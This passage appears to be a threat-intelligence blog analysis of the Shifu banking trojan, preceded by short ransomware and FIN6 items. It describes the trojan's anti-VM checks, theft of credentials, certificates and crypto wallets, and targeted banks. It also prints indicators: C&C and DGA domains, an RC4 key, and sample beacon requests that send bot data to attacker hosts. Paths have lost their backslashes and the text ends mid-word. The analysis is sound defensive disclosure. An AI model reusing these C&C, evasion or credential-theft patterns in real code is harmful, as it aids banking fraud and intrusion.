garnered from highly publicized campaigns undoubtedly resonating among
cyber criminals. Recent campaigns in which targeted victims paid the
ransom demand reinforce the legitimacy and popularity of this
particular attack method.
One of the most worrying threats concerns the targeted deployment of
ransomware after the attackers have already gained a foothold in the
network. In these cases, threat actors may be able to conduct
reconnaissance to strategically disable or delete backups and identify
those systems most critical to an organization&s operations before
deploying the ransomware. To increase the difficulty of such an
attack, enterprises are encouraged to properly segment networks and
implement access controls. In addition, enterprises should evaluate
backup strategies regularly and test those backups to ensure that
recovery is successful. Finally, copies of backups should be stored
offsite in case onsite backups are targeted.
Learn more about ransomware during our webinar on May 19, 2016, at
11:00am EDT.
Cybercrime operations can be intricate and elaborate, with careful
planning needed to navigate the various obstacles separating an
attacker from a payout. Yet reports on these operations are often
fragmentary, as the full scope of attacker activity typically occurs
beyond the view of any one group of investigators.
FireEye Threat Intelligence and iSIGHT Partners recently combined
our research to provide a unique and extensive look into the
activities of one particular threat group: FIN6.
FIN6 is a cyber criminal group that steals payment card data for
monetization from targets predominately in the hospitality and retail
sectors. The group was observed aggressively targeting and
compromising point-of-sale (POS) systems and making off with millions
of payment card numbers. These card numbers were later sold on a
particular underground &card shop,& potentially earning FIN6 hundreds
of millions of dollars.
This report provides wide-ranging, end-to-end visibility into FIN6&s
cybercrime operations, detailing initial intrusion, methods used to
navigate the victim network, other tactics, techniques, and procedures
(TTPs), and the sale of stolen payment card data in an underground marketplace.
Please join us for a webinar on Thursday, May 5 at 11:00am ET/8:00am
The video below offers an overview of the methods FIN6 uses.
A Look at Shifu – Behavior, Capabilities and
Communications…
As part of our
normal course of operations as a cyber threat intelligence provider,
we monitor the
underground and provide analysis
to our clients on new and emerging threats. As you can imagine, we
naturally run into large quantities of malware on a daily basis.
From time to time, we release findings to the public in the interest
of informing the community around new threats and providing
actionable analysis to support the hunt and kill missions. Below is
a write up on the Shifu trojan – we hope that you find this useful
and that it helps you better protect your organization from this
Should you have any questions
about the details in this blog, please do not hesitate to
and we will work to get you the answers that you
Key Points:
Shifu is a novel malware family built
using tactics, techniques and procedures (TTPs) from multiple
malware families including Shiz, Zeus and possibly Dridex.
Noteworthy to Shifu is a custom
application program interface (API) that is used to control the
various aspects of the malware and to report the results of the
API execution back to the attacker.
Httpd, an Apache HTTP server, is
installed and used by Shifu to communicate with the attacker’s
command and control (C&C) server.
Known Targeted Entities…
At current, targeting seems to focus
largely on the UK and Japan. However, this does not mean that other
geographies are not at risk from Shifu and its controllers.
The following is a list of targeted UK
entities (we are continuing our attempts to retrieve a list of
targeted entities for Japan):
Adam & Company
Allied Irish Bank (IBusiness
Bank of Scotland
Clydesdale & Yorkshire Bank
Coutts & Co.
Danske Bank
Lloyds Bank
NatWest Online Banking
Royal Bank of Scotland Digital
Triodos Bank
Ulster Bank
Unity Trust Bank
Yorkshire Building Society
Analysis of Representative Malware
iSIGHT Partners analyzed
numerous samples of the Shifu malware. This malware recently donned
the name Shifu, but earlier variants of the malware were referred to
as “PowerAgent.” The deviation in the name is due to the
Windows Registry key that the malware creates,
“IntelPowerAgent6.”
malware shares many similarities with other known banking Trojans
such as Zeus, Dridex and Shiz. Like many malware families created
after the emergence of Zeus, there is a blending of tactics,
techniques and procedures (TTPs) for multiple malware families. Each
of these similarities will be examined in detail.
The malware uses several methods to evade
analysis and frustrate researchers. When first launched, the malware
uses a loader to drop, install and patch the core payload prior to
execution. If the payload is run as a standalone application, it
will appear corrupted since the loader patches several payload parts
during installation. It also has the capability to blacklist
applications such as other bots, anti-virus (AV) applications and
research tools. The malware uses cyclic redundancy check (CRC)
hashes for any application that is blacklisted or whitelisted, as we
will cover later.
In addition to
the noted blacklist, the loader has a separate application blacklist
check that will immediately end execution of the malware if a listed
application is detected. Additionally, the loader will check a CRC
hash of itself and, if found, will bypass any virtual machine (VM)
detection routines. This check is possibly used for testing
purposes, and the hash is based on the name of a development copy to
prevent the malware from terminating as a result of running in a VM.
The loader will also check to see if a SmartCard reader is attached
to the infected machine and, if detected, will bypass any other VM
detections routines. This is probably because the presence of a
SmartCard reader signifies a physical machine rather than a VM.
Shifu also uses several more CRC hash
lists to determine which branching function to use. The following
are some of the lists or hashes the malware checks:
List of web browsers that will hook
Winsock APIs if found to monitor network traffic
Specific domains and/or hashes that
initiate C&C communications
Name/hash for httpd (standalone Apache
HTTP server)
Point-of-sale
(POS) process names and hashes for likely related
applications
Bitcoin wallets
Although Shifu contains certain CRC
hashes for identifying security products and analysis tools, it also
contains a list of AV vendors to check. The malware will not
terminate after identifying one of the following and will only check
prior to posting any data to the attacker’s command and control
(C&C) server:
AVAST Avast
Data Fellows – F-Secure
Panda Software
Doctor Web
Eset – Nod
Softed – ViGUARD
Bitdefender
ComodoGroup
KasperskyLab – protected
Microsoft Antimalware
TrendMicro
Network Associates- TVD
Zone Labs – ZoneAlarm
Two components
effectively make up the initial Shifu binary: a loader and a DLL
(main payload). The loader is responsible for performing all of the
anti-VM, anti-analysis and anti-sandbox checks. If all of the checks
pass, the loader will decompress, patch and inject the core DLL into
the shell process. Querying the following Windows registry key
identifies the shell process:
HKLMSoftwareMicrosoftWindows
NTCurrentVersionwinlogon”shell”
After querying the registry key, the
loader attempts to inject the patched DLL in the shell process.
Significantly, the DLL itself is in a corrupted state after
decompression and requires the loader to patch it before injection
into the shell process. The patching process is as follows:
Patch MZ, PE header
Patch entry point relative virtual
address (RVA)
Patch import
Decode imports
Obfuscate all imported APIs
Static Analysis
Shifu is heavily obfuscated, and initial
examination of the payload revealed little of interest aside from a
possible custom packer used by the malware called
“divederail” with a compile time of Aug. 6, 2015.
After successfully patching and examining the core DLL, the
following project folder and debug string was revealed:
Z:codingprojectmainpayloadpayload.x86.pdb
During our analysis, we uncovered
many different modules that the malware uses, including the
following:
payload.cpp
srcfuckup.cpp
srcsystem.cpp
srcipc.cpp
srckillos.cpp
srcbot.cpp
srckeylog.cpp
srcseh.cpp
srccerts.cpp
srcknock.cpp
srcdebugmsg.cpp
srccmdinject.cpp
srclogsend.cpp
srcstr.cpp
srccmdload.cpp
srcmitm.cpp
srcfileio.cpp
srccmdmitm.cpp
srcmsghook.cpp
srcmemory.cpp
srccmdupdate.cpp
srcproclist.cpp
srchashes.cpp
srccommands.cpp
srcrootkit.cpp
srcjpeg.cpp
srcconfig.cpp
srcsniffer.cpp
srcinet.cpp
srcdga.cpp
srcsystems.cpp
srcdgalib.cpp
srcsysinfo.cpp
srcvirtkeys.cpp
srcosver.cpp
srcdllinject.cpp
srcvnc.cpp
The core payload has a plethora of
capabilities and possible modules it can download for added
functionality. The malware re-uses some functionality from Zeus,
Dridex and Shiz. This data is highlighted below:
Zeus Functions:
tellerplus|bancline|fidelity|micrsolv|bankman|vanity|episys|jack
henry|cruisenet|gplusmain|silverlake|v48d0250s1
(Same process checks seen from Zeus. If
Shifu detects any of these strings, it will take a screenshot, post
key log data and send system information to the attacker’s C&C
Additionally, some of
the anti-analysis and anti-VM techniques are consistent with
previous Zeus variants.
Shiz Functions:
Shifu uses a modified version of the
Shiz DGA. The variables and methods used in the generation of the
domains have changed.
Dridex Functions:
Although not an explicit function, Shifu
uses an XML configuration file similar to that of the Dridex
malware (aka Bugat).
is able to accept a range of commands, from updating the bot to
destroying the operating system (OS). The following are the commands
that Shifu supports:
deactive_sk
deactive_bc
wipe_cookies
mitm_script
In addition to being able to use the above
commands, Shifu uses a custom API for controlling the bot and
reporting results of the API execution back to the C&C server.
The following is a table containing these API functions:
FileSaveTo
PayloadRoutine
AvProcessResult
FileToBase64
PrintScreenJpeg
BotEnableAutorunAndProtect
ProcessCommand
BotFixAutorunPolicy
ProcListInjectAll
BotIsResident
GetLastErrorWinInet
ReportOKCmd
BotNameInitialize
RkSetHidden
BotProtectFile
RootkitInit
CertgrabProccessSystemStores
HttpSendRequestExtended
SehInitialize
CertHandlerContinue
SendAccount
CertsFixValidateCA
InetDownloadFile
SnifferInit
CertsSetHooks
InetHostCheckConnection
StartHttpd
CheckFileMD5
InetIsHostOnline
StartKnockRoutine
CheckProcessesFromZeusGOV
InetSendRequestPOST
StrGetTextBetween
CheckResidentStateThread
IpcInitServerThread
StrUnicodeToAscii
CommandDoInject
SysCloseHandle
CommandDoLoad
IpcProcessPipeStr
SysEnableExeAutoRun
CommandDoMitmMod
IpcProcessSendWEbLog
SysExecuteFile
CommandDoMitmScript
IpcProcessSetSocksPort
SysGetModuleHandlePin
CommandDoUpdate
IpcProcessSetVncPort
SysGetNiceCompName
ConfigCheckPlugins
IpcSendSystem
SysGetNiceUserName
ConfigForceRead
IpcSendWebSniffLog
SysGetProcessIntegrityLevel
ConfigInit
KeyLogAddToLog
SysGetUserProfileDir
ConfigLoad
KeyLogGetLastCaption
SysInfoNetstat
ConfigProcessPacked
KeyLogInit
SysInfoNetUser
ConfigSave
KnockDoKnock
sysInfoTaskMgr
ConfigWatch
KnockRoutine
SystInitializeLowSecAttrs
ConnectToNewClient
LogSendData
SysInjectDllToProcessById32
DomainCheckSign
LogSendSystemLogEx
SysIsCompInDomain
DomainCheckThread
LogSendWebLog
SysIsKernelLoaded
DomainDownloadKey
SysIsProcessActiveByCRC32
DomainValidateKeyStr
MemProtect
SysIsTerminalSessionProcess
EntryPoint
MemRealloc
SysIsWow64
ExportCertificates
FileCryptDecryptRC4
MitmWriteConfigPhp
SysLoadLibraryAndCallOrdinal32
FileDelete
MitmWriteListenAddrs
SysStartThread
FileDeleteDir
MsghookInit
SystemsCheckCryptoWallets
FileDeleteSubDir
MyPFXImportCertStore
SystemCheckDirs
FileGetSize
OsGetVersion
SysTerminateProcessByPid
FileGetTemp
PatchChromeCertCheck
TopLevelIExceptionHandler
FileLoadFrom
Patchcrptui
VkIsGoodWindow
FileMakeDir
Patcrsaenhnew
VkMageMicroScrshot
PayloadResidentRoutine
Anti-Analysis, Anti-VM &
Anti-Sandbox
Many different types of
malware are designed to detect the presence of a VM, sandbox or if
the malware is being analyzed or debugged. Shifu takes this
detection to an extreme level by including dozens of checks with
branching functionality, from terminating itself to reporting back
to its C&C server. The following sections list the various
checks that Shifu performs, including the CRC32 hashes the malware
will check against running processes. Due to the possibility of
collisions, we are unable to perform reverse CRC32 hash lookups in
an attempt to find the name of the processes targeted:
Terminate Immediately
sbiedll.dll
dbghelp.dll
api_log.dll
dir_watch.dll
pstorec.dll
c:analysissandboxstarter.exe
c:analysis
c:insidetm
c:windowsystem32driversvmmouse.sys
c:windowsystem32driversvmhgfs.sys
c:windowssystem32driversvmboxmouse.sys
system32rstrui.exe
Additional checks the malware makes to
determine branching functionality are summarized in the following
Skip VM Check
SmartCard reader found 5217027 CRC
of malicious payload If running on 64-bit system
Hook Winsock API (Traffic
84E35F10 |
firefox.exe C3DDC6D5 | iexplore.exe 9C1D0D0E |
chrome.exe
Restart Internal Apache HTTP
Connect to C&C (if connection
is made to the listed domains, malware will connect to
Functionality to Take Screenshot, Grab System Information and
Capture Key Log Data to Send to C&C Server
OmikronMCSign
HBPDatahbp.profile
ELBA5ELBA_data
jack henry
silverlake
v48d0250s1
In addition to these searching and
branching functions, Shifu will also search the infected machine for
Bitcoin-related items in an attempt to steal the data and upload the
C&C server. Shifu attempts to find the following files:
bitcoinwallet.dat
litecoinwallet.dat
If the Bitcoin files are found, the data
is saved in a new file prior to uploading to the attacker’s C&C.
The following file names will be used for the captured data:
btc_wallet.dat
ltc_wallet.dat
Shifu also contains a list of processes to
monitor on the infected machine. The goal of the monitoring is to
blacklist and corrupt downloaded binary files from running on the
infected system. The malware hooks the URLDownloadToFile API in the
urlmon.dll library to facilitate this capability. The following
snippet illustrates the file rename to “infected.exx,”
processes to monitor and API function to hook:
During installation, the loader for Shifu will query a number
of settings to include the computer name, user name, install date
and system drive volume serial number. The malware will then create
a string with the compiled data. If the “string” of data
contains any sub-strings defined by the malware, it will set a
control flag, which will likely trigger an event from the C&C
server. The following is a list of the “sub-strings”
hardcoded into the binary (Note: several of the sub-strings appear
to be Russian words or parts of words):
6occRussian and similar in
pronunciation
May refer to head of a branch for an
organized crime syndicate.&However, the translation is
slightly off as the “c” would be a hard
“k”sound in Russian
RosPil is a non-profit community
project dedicated to combating abuse and is associated&with
the political activist Alexey Navainy. “ROS” may
refer to “Rossia” or “Russia”
Russian word meaning “Financial
Department”
Likely abbreviation for
“operation”
Likely abbreviation for derivatives
of “finance”
Possible abbreviation for the
Russian word meaning “Director” in English
“Cashbox” or “Cash
Desk”
Possibly the first syllable in the
Russian word for “accounting”
Shifu is also
designed to search for authentication information (AUTHINFO) on the
infected machine. Specifically, it searches for the following:
AUTHINFO USER
AUTHINFO PASS
In order to capture this information, the
malware will hook the following API functions:
CryptEncrypt
If ports 110 or 31595 are open, the
captured credentials will be saved as e-mail credentials. If the
ports are not open, the credentials will be saved as FTP
credentials.
In addition to grabbing
the AUTHINFO data, the malware will capture any SSL certificates on
the machine. If the cert is captured, the malware will rename it as
_info.pfx (i.e. 1_info.pfx) and then sequentially increase the
number. The following strings show the hard-coded format to save the
file and the API function used to capture the data:
%s%s%u_cert.pfx
%s%s%u_info.txt
CertEnumSystemStore
Behavior on Infected System (Dynamic
Upon initial execution,
Shifu behaves similar to many malware families by generating a
randomized name for a local copy of itself in the user’s
%ProgramData% folder. It will then execute a loader in a separate
process that patches the main payload DLL and handles the injection
into the shell process, explorer.exe.
In parallel to the launch, the malware
will create a BAT file with deletion commands for the original
binary. This has become the standard for much of the recent e-crime
malware. Shifu also creates two different registry keys used for
persistence and to survive a reboot. One of the registry entries is
a RUN key to startup on reboot of the infected system.
The malware will also initiate a keylogger
and begin beaconing out to an attacker’s C&C domain. The initial
domain is hardcoded into the malware, but if connection repeatedly
fails, Shifu will fall back to its DGA, which is a modified adaption
of the Shiz DGA. Several other files are created on disk as well.
The following list shows the various artifacts created after
launching the malware:
C:%ProgramData% d04dj0886b.exe
(Copy of the original binary)
C:%AppData%Locallld7D53.tmp.bat
(Deletion script)
C:%AppData%LocalTemp2d17e659d
(Text file with location of copied binary)
C:%AppData%a8ee54f4sysinfo.txt
(Collected information on running process on the infected
C:%AppData%a8ee54f4 (Key log
Modifications & Persistence Method
HKCUSoftwareMicrosoftWindows2d17e6
HKCUSoftwareMicrosoftWindowsCurrentVersionRunIntelPowerAgent6
We have also observed different IntelPowerAgent numbers
such as two, three, four or five.
Command and Control
contains a hard-coded URL for the first initial contact but also has
a DGA that it will fall back on if the main C&C is offline. This
DGA is modeled after Shiz but uses slightly different parameters for
generating the domains. All of the communications that follow a
successful connection use Secure Socket Layer (SSL). See the
following for one of the more recent SSL certificates which has
already been blacklisted:
The bot will report key information back to the C&C,
including the result of the various custom API executions. The first
communications include any hard-coded C&C followed by the DGA.
Shifu uses RC4 encryption in the network communications. Notably,
the key for the samples analyzed by iSIGHT Partners is actually the
default RC4 key included with the Crypto library, further suggesting
this malware is under development. The following is the key
a7zoSTHljZylEx4o3mJ2eqIdsEguKC15KnyQdfx4RTc5sjHThe following are some of the observed hard-coded domains and
DGA domains:
noyokoya-info.chu.jp
eboduftazce-ru.com
adtejoyo1377.tk
fat.uk-fags.top
urkaelt.info (DGA)
nqqxqdg.info (DGA)
fvffynt.info (DGA)
njkyhle.info (DGA)
oaoyorw.info (DGA)
raemscf.info (DGA)
pbchjln.info (DGA)
bgnqado.info (DGA)
The following is an example POST made by
the malware if it is successful in achieving a connection with the
https://eboduftazce-ru.com/news/userlogin.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded Referer:
https://www1.google.com
User-Agent:
Mozilla/4.0 ( MSIE 2.1; Windows NT 5.1; Trident/4.0;
SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
Media Center PC 6.0) Host: eboduftazce-ru.com
Content-Length: 92 Cache-Control: no-cache
After the initial POST, the malware will
perform a check-in with the following GET request:
/logs/dbg.php?msg=W3NyY1xib3QuY3BwOkJvdElzUmVzaWRlbnQ6MTcxXVsweGViMDsweDdjY10gQm90SXNSZXNpZGVudCByZXR1cm5lZCBGQUxTRQo=
HTTP/1.1 Accept: */* Accept-Encoding: gzip,
deflate User-Agent: Mozilla/4.0 ( MSIE 6.0; Windows
NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.;
.NET CLR 3.5.30729) Host: noyokoya-info.chu.jp
Connection: Keep-Alive
“msg” Data: [srcbot.cpp:BotIsResident:171][0xeb0;0x7cc]
BotIsResident returned FALSE
sends many different check-ins back to the C&C server. These
check-ins are based on the execution of the custom API functions.
After the bot uses a function, the execution result is sent back to
the C&C. The following is a list for many of the “msg”
check-ins:
[:BotIsResident:153][0xef8;0xbe0]
MutexName = 2d17e659d346, hMutex = 0x000000ec, GetLastError() =
[:BotNameInitialize:388][0x6e4;0x960]
BotName: ADMINISTRATOR!MIR!FB950325
[:KnockDoKnock:108][0x6e4;0x960]
KnockBuffer:
botid=ADMINISTRATOR!MIR!FB950325&ver=1.537&up=347&os=2300&ime=%2b5&token=0&cn=a3&av=&dmn=
[:HttpSendRequestExtended:116][0x6e4;0x960]
GetLastErrorWinInet: ERROR_INTERNET_CANNOT_CONNECT
[:GetLastErrorWinInet:127][0x6e4;0x960]
[:InetSendRequestPOST:249][0x6e4;0x960]
GetLastErrorWinInet: (null)
[:KnockDoKnock:175][0x6e4;0x960]
KnockDoKnock &=
[:ProcListInjectAll:325][0x6e4;0x968]
First time inject in: HEdit.exe [0x00000b04]
[:BotIsResident:153][0xb04;0x9b0]
MutexName = 2d17e659d346, hMutex = 0x, GetLastError() =
[:ProcListInjectAll:325][0x6e4;0x968]
First time inject in: notepad++.exe [0x0000089c]
The Shifu Trojan has targeted entities in
the UK and Japan. As noted previously, the malware runs a local
Apache httpd server. This server is used to handle C&C
communications, retrieve configuration data and store the web
injects. The configuration data is stored in a “data”
folder wi}